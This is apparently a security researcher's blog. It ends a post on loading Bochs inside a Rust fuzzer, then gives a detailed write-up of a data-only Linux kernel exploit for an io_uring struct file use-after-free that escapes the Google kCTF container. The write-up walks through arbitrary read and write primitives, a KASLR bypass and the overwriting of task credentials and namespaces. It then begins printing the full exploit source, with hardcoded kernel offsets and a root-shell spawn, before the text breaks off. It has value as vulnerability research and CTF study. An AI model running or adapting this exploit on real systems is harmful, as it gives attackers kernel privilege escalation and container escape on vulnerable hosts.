The last piece of information I think worth noting here is that I created a constant called STACK_DATA_MAX and the length of the stack data cannot be more than that tunable value. We use this value to set up RSP when we jump to the program in memory and start executing. RSP is set so that it is at the absolute lowest address possible, which is the stack allocation size - STACK_DATA_MAX. This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into since the stack grows down in memory.

Executing the Loaded Program

Everything at this point should be setup perfectly in memory and all we have to do is jump to the target code and start executing. For now, I haven’t fleshed out a context switching routine or anything we’re literally just going to jump to the program and execute it and hope everything goes well. The code I used to achieve this is very simple:

pub fn start_bochs(bochs: Bochs) {
    // Set RAX to our jump destination which is the program entry, clear RDX,
    // and set RSP to the correct value
    unsafe {
        asm!(
            "mov rax, {0}",
            "mov rsp, {1}",
            "xor rdx, rdx",
            "jmp rax",
            in(reg) bochs.entry,
            in(reg) bochs.rsp,
        );
    }
}

The reason we clear RDX is because if the _start routine sees a non-zero value in RDX, it will interpret that to mean that we are attempting to register a hook located at the address in RDX to be invoked when the program exits, we don’t have one we want to run so for now we NULL it out. The other register values don’t really matter. We move the program entry point into RAX and use it as a long jump target and we supply our handcrafted RSP so that the program has a stack to use to do its relocations and run properly.

dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[17:43:19] lucid> Loading Bochs...
[17:43:19] lucid> Bochs loaded { Entry: 0x19F50, RSP: 0x7F513F11C000 }
Argument count: 3
Args:
   -./bochs
   --AAAAA
   --BBBBBBBBBB
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
dude@lol:~/lucid/target/release$ 

The program runs, parses our command line args, and exits all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curious…

Will Bochs Run?

We have to see right? First we have to compile Bochs as a -static-pie ELF which was a headache in itself, but I was able to figure it out.

ude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[12:30:40] lucid> Loading Bochs...
[12:30:40] lucid> Bochs loaded { Entry: 0xA3DB0, RSP: 0x7FEB0F565000 }
========================================================================
                        Bochs x86 Emulator 2.7
              Built from SVN snapshot on August  1, 2021
                Timestamp: Sun Aug  1 10:07:00 CEST 2021
========================================================================
Usage: bochs [flags] [bochsrc options]

  -n               no configuration file
  -f configfile    specify configuration file
  -q               quick start (skip configuration interface)
  -benchmark N     run Bochs in benchmark mode for N millions of emulated ticks
  -dumpstats N     dump Bochs stats every N millions of emulated ticks
  -r path          restore the Bochs state from path
  -log filename    specify Bochs log file name
  -unlock          unlock Bochs images leftover from previous session
  --help           display this help and exit
  --help features  display available features / devices and exit
  --help cpu       display supported CPU models and exit

For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
00000000000p[      ] >>PANIC<< command line arg '-AAAAA' was not understood
00000000000e[SIM   ] notify called, but no bxevent_callback function is registered
========================================================================
Bochs is exiting with the following message:
[      ] command line arg '-AAAAA' was not understood
========================================================================
00000000000i[SIM   ] quit_sim called with exit code 1

Bochs runs! It couldn’t make sense of our non-sense command line arguments, but we loaded it and ran it successfully.

Next Steps

The very next step and blog post will be developing a context-switching routine that we will use to transition between Fuzzer execution and Bochs execution. This will involve saving our state each time and function basically the same way a normal user-to-kernel context switch functions.

After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, we’ll try to run that in the Fuzzer.

Resources

I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: https://fasterthanli.me/series/making-our-own-executable-packer/part-17.
Also shoutout @netspooky for helping me understand the stack layout!
Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)

Code

https://github.com/h0mbre/Lucid

Escaping the Google kCTF Container with a Data-Only Exploit

2023-07-29T00:00:00+00:00

Introduction

I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_ring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge, if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.

The Bug

The bug is extremely simple (why can’t I find one like this?) and was exploited in kCTF in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.

I won’t go into the bug very much because it wasn’t really important to the excercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (recount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING request which, upon completion will erroneously decrement the refcount (refcount == 1), and then finally, call io_uring_unregister_files which ends up decrementing the recount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.

What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for descrepancies between those routines.

Giant Shoulders

It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke-down in exquisite detail how to coerce the Linux kernel to free an entire page of file objects back to the page allocator by utilizing a technique called “cross-cache”. file structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the struct file size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.

Instead of using this trick of getting our entire victim page of file objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of the a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my expierence. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.

Arbitrary Read

The first thing I started to look for, was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl syscall in fs/fcntl.c. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an fd as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f for the function copy_to_user. This seemed like a relatively logical way to find a method of leaking data back to userspace.

The copy_to_user function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.

Now if you go to the source code and do the find on copy_to_user, the 2nd result is a snippet in this bit right here:

static long fcntl_rw_hint(struct file *file, unsigned int cmd,
			  unsigned long arg)
{
	struct inode *inode = file_inode(file);
	u64 __user *argp = (u64 __user *)arg;
	enum rw_hint hint;
	u64 h;

	switch (cmd) {
	case F_GET_RW_HINT:
		h = inode->i_write_hint;
		if (copy_to_user(argp, &h, sizeof(*argp)))
			return -EFAULT;
		return 0;
	case F_SET_RW_HINT:
		if (copy_from_user(&h, argp, sizeof(h)))
			return -EFAULT;
		hint = (enum rw_hint) h;
		if (!rw_hint_valid(hint))
			return -EINVAL;

		inode_lock(inode);
		inode->i_write_hint = hint;
		inode_unlock(inode);
		return 0;
	default:
		return -EINVAL;
	}
}

You can see that in the F_GET_RW_HINT case, a u64 (“h”), is copied back to userspace. That value comes from the value of inode->i_write_hint. And inode itself is returned from file_inode(file). The source code for that function is as follows:

static inline struct inode *file_inode(const struct file *f)
{
	return f->f_inode;
}

Lol, well then. If we control the file, then we control the inode as well. A struct file looks like this:

struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
<SNIP>

And since we’re using the pipe buffer as our replacement object (really the entire page), we can set inode to be an arbitrary address. Let’s go check out the inode struct and see what we can learn about this i_write_hint member.

struct inode {
	umode_t			i_mode;
	unsigned short		i_opflags;
	kuid_t			i_uid;
	kgid_t			i_gid;
	unsigned int		i_flags;

#ifdef CONFIG_FS_POSIX_ACL
	struct posix_acl	*i_acl;
	struct posix_acl	*i_default_acl;
#endif

	const struct inode_operations	*i_op;
	struct super_block	*i_sb;
	struct address_space	*i_mapping;

#ifdef CONFIG_SECURITY
	void			*i_security;
#endif

	/* Stat data, not accessed from path walking */
	unsigned long		i_ino;
	/*
	 * Filesystems may only read i_nlink directly.  They shall use the
	 * following functions for modification:
	 *
	 *    (set|clear|inc|drop)_nlink
	 *    inode_(inc|dec)_link_count
	 */
	union {
		const unsigned int i_nlink;
		unsigned int __i_nlink;
	};
	dev_t			i_rdev;
	loff_t			i_size;
	struct timespec64	i_atime;
	struct timespec64	i_mtime;
	struct timespec64	i_ctime;
	spinlock_t		i_lock;	/* i_blocks, i_bytes, maybe i_size */
	unsigned short          i_bytes;
	u8			i_blkbits;
	u8			i_write_hint;
<SNIP>

So i_write_hint is a u8, aka, a single byte. This is perfect for what we need, inode becomes the address from which we read a byte back to userland (plus the offset to the member).

Since we control 100% of the backing data of the file, we thus control the value of the inode member. So if we set up a fake file struct in memory via our pipe buffer and have the inode member be 0x1337, the kernel will try to deref 0x1337 as an address and then read a byte at the offset of the i_write_hint member. So this is an arbitrary read for us, and we found it in the dumbest way possible.

This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?

Finding a Read Target

So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the file UAF, but also vaguely from @ky1ebot tweets like this one.

cpu_entry_area is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled for instance.

After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area consistently and that was an address inside the error_entry function which is as follows:

SYM_CODE_START_LOCAL(error_entry)
	UNWIND_HINT_FUNC

	PUSH_AND_CLEAR_REGS save_ret=1
	ENCODE_FRAME_POINTER 8

	testb	$3, CS+8(%rsp)
	jz	.Lerror_kernelspace

	/*
	 * We entered from user mode or we're pretending to have entered
	 * from user mode due to an IRET fault.
	 */
	swapgs
	FENCE_SWAPGS_USER_ENTRY
	/* We have user CR3.  Change to kernel CR3. */
	SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
	IBRS_ENTER
	UNTRAIN_RET

	leaq	8(%rsp), %rdi			/* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:

	/* Put us onto the real thread stack. */
	call	sync_regs
	RET
<SNIP>

error_entry seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function, might be found on what I was guessing was an interrupt stack in the cpu_entry_area. The address was the address of the call sync_regs portion of the function. I was never able to confirm what types of common exceptions/interrupts would’ve been taking place on the system that was pushing that address onto the stack presumably when the call was executed, but maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least and the address’ presence in the cpu_entry_area was extremely common to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.

Again, this portion didn’t take very long to figure out because I had just been introduced to cpu_entry_area by the aforementioned blogposts at the time.

Where are the Write Gadgets?

I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd as an argument and tracing through them looking for calls to copy_to_user, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx of a signalfd file is stored in the f.file->private_data field and how the signalfd syscalls allows the attacker to perform a write of the ctx->sigmask. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx in memory would be quite easy since we have access to an entire page of memory.

I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data field of our struct file. So at this point, I went hunting for usages of private_data in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.

This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring itself.

Looking for instances where the file->private_data was used, I quickly found an instance right in the very function that was related to the bug. In io_msg_ring, you can see that a target_ctx of type io_ring_ctx is derived from the req->file->private data. Since we control the fake file, we control can control the private_data contents (a pointer to a fake io_ring_ctx in this case).

io_msg_ring is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux, we actually retrieve a io_uring_cqe struct from our potentially faked io_uring_ctx via io_get_cqe. Immediately, we see several WRITE_ONCE macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur, didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.

Immediately after the call to io_fill_cqe_aux, there is one to io_commit_cqring using our faked io_uring_ctx:

static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
	/* order cqe stores with ring update */
	smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}

This is basically a memcpy, we write the contents of ctx->cached_cq_tail (100% user-controlled) to &ctx->ring->cq.tail (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.

Exploitation Plan

Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.

I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.

Finding Init

At this point, my goal is to find the host Init task_struct in memory and find the value of a few important members: real_cred, cred, and nsproxy. real_cred is used to track the user and group IDs that were originally responsible for creating the process and unlike cred, real_cred remains constant and does not change due to things like setuid. cred is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct. Luckily, the address of the init task is a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the init task symbol).

Forging Objects

With those values in hand, we now need to find our own task_struct in memory so that we can overwrite our members with those of init. To do this, I took advantage of the fact that the task_struct has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name, this name fits within the task_struct comm field, and so as I traverse through the linked list of tasks on the system, I just simply check each task’s comm field for my easily identifiable child process. You can see how I do that in this code snippet:

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember that we need to fake a few objects in memory, like the io_uring_ctx for instance. Usually this done by crafting objects in the kernel heap and somehow discoverying their address with a leak. In my case, I have a whole pipe buffer which is 4096 bytes of memory to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files member. After some time printk some offsets, I was able to traverse through my own task’s file descriptor table and learn the address of my pipe buffer. This is because the pipe buffer page is obviously page aligned so I can just page align the address we read from the file descriptor table as the address of our UAF file. So now I know exactly in memory where my pipe buffer is, and I also know what offset onto that page our UAF struct file resides. I have a small helper function to set a “scratch space” region address as a global and then use that memory to set up our fake io_uring_ctx. You can see those functions here, first finding our pipe buffer address:

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

And then determining the location of our scratch space where we will forge the fake io_uring_ctx:

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

Now we have one more read to do and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_uring_ctx contains as many valid fields as necessary. If you start with a completely NULL object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real io_uring_ctx instead by reading and copying its contents to a global buffer. Working now from a good base, our forged object can then be set-up properly to perform our arbitrary write from, you can see me using the copy and updating the necessary fields here:

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

Performing Our Writes

Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:

cqe = io_get_cqe(ctx);
	if (likely(cqe)) {
		WRITE_ONCE(cqe->user_data, user_data);
		WRITE_ONCE(cqe->res, res);
		WRITE_ONCE(cqe->flags, cflags);

They worked really well until I went to overwrite the target nsproxy member of our target child task_struct. One of those writes inevitably overwrote the members right next to nsproxy: signal and sighand. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just the 4-byte write instead inside io_commit_cqring. The 4-byte write also caused problems in that at some points current has it’s creds checked and with what basically amounted to a torn 8-byte write, we would leave current cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.

Now we can just use those same steps to overwrite the three members real_cred, cred, and nsproxy and now our child has all of the same privileges and capabilities including visiblity into the host root file system that init does. This is perfect, but I still wasn’t able to get the flag!

I started to panic at this point that I had seriously done something wrong. The exploit if FULL of paranoid checks: I reread every overwritten value to make sure it’s correct for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered in Andy Nguyen’s blog post, he used his root privileges to explictly set his namespace values with calls to setns. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how setns is implemented, but this could probably be done without explicit setns calls and only with our read and write tools:

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

And finally I was able to drop into a root shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal, I had some out of band confirmation/paranoia checks I had to leave out but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux unlike most of the other fcntl syscall flags. At that point remember, we don’t know enough information to fake any objects in memory so I’d be dead in the water if that read method was ruined by SELinux.

Conclusion

This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.

// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#include "liburing.h"

// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to 
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL

// Shared memory with child
void *g_shmem;

// Child pid
pid_t g_child = -1;

// io_uring instance to use
struct io_uring g_ring = { 0 };

// UAF file handle
int g_uaf_fd = -1;

// Track pipes
struct fd_pair {
    int fd[2];
};
struct fd_pair g_pipe = { 0 };

// The offset on the page where our `file` is
size_t g_off = 0;

// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };

// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;

// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;

void err(const char* format, ...)
{
    if (!format) {
        exit(EXIT_FAILURE);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, ": %s\n", strerror(errno));

    sleep(5);
    exit(EXIT_FAILURE);
}

void info(const char* format, ...)
{
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

// Get FD for test file
int get_test_fd(int victim)
{
    // These are just different for kernel debugging purposes
    char *file = NULL;
    if (victim) { file = "/etc//passwd"; }
    else { file = "/etc/passwd"; }

    int fd = open(file, O_RDONLY);
    if (fd < 0)
    {
        err("`open()` failed, file: %s", file);
    }

    return fd;
}

// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
    // Open file to register
    g_uaf_fd = get_test_fd(1);
    info("Victim fd: %d", g_uaf_fd);

    // Register the file
    int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
    if (ret)
    {
        err("`io_uring_register_files()` failed");
    }

    // Get hold of the sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Init sqe vals
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = 0;
    sqe->flags |= IOSQE_FIXED_FILE;

    ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu_id, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
    {
        err("`sched_setaffinity()` failed: %s", strerror(errno));
    }

    return;
}

// Increase the number of FDs we can have open
void increase_fds(void)
{
    struct rlimit old_lim, lim;
	
	if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
    {
        err("`getrlimit()` failed: %s", strerror(errno));
    }
		
	lim.rlim_cur = old_lim.rlim_max;
	lim.rlim_max = old_lim.rlim_max;

	if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
    {
		err("`setrlimit()` failed: %s", strerror(errno));
    }

    info("Increased fd limit from %d to %d", old_lim.rlim_cur, lim.rlim_cur);

    return;
}

void create_pipe(void)
{
    if (pipe(g_pipe.fd) == -1)
    {
        err("`pipe()` failed");
    }
}

void release_pipe(void)
{
    close(g_pipe.fd[PIPE_WRITE]);
    close(g_pipe.fd[PIPE_READ]);
}

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
